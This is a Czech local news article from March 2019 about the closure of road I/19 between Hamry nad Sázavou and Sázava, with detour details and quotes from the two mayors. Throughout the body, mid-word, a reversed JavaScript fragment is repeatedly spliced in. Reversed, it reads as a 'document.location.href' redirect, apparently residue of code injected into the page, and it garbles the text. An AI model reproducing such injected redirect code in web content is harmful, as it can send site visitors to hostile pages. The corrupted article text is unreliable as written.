Rainbow page separator

„Devatenáctka“ od Hamrů po Sázavu bude půl roku neprůjezdná

Neděle, 31. března 2019

Hamry nad Sázavou, Sázava – Od 1. dubna se budou muset mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristé i obyvatelé smířit s uzavírkou silnice I/19 mezi Hamry nad Sázavou a Sázavou. Státní komunikace se bude rekonstruovat, stavební práce potrvají do konce září.
Uzavírka začne u benzinové stanice na začátku Hamrů ve směru od Žďáru a její konec bude za mostem přes železnici nedaleko nádraží v Sázavě, přičemž práce se budou provádět po etapách. Ve směru na Přibyslav mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy čeká objížďka přes Polničku, Račín a Vepřovou.
„Naše obec bude přístupná od Žďáru po železničním mostu na křižovatku k benzinové stanici, provoz v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úseku bude řízen semafory. Dále bude nutné jezdit obcí,“ informoval hamerský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Hubert Křesťan. Obyvatelům bydlícím podél opravované silnice stavbaři umožní přístup na jejich pozemky. Stejně tak by [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu mělo být i v Sázavě. Průjezdná zůstane křižovatka u nádraží směrem k Velké Losenici a Přibyslavi, kde bude provoz řízen pomocí světelné signalizace, a také další průjezdy v obci, s výjimkou krátké doby, kdy dojde na pokládku asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového povrchu. „Přesné informace podle postupu prací a konkrétní situace budou lidem zasílány prostřednictvím SMS zpráv a zveřejňovány na interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových stránkách obce,“ uvedl starosta Sázavy František Ledvinka.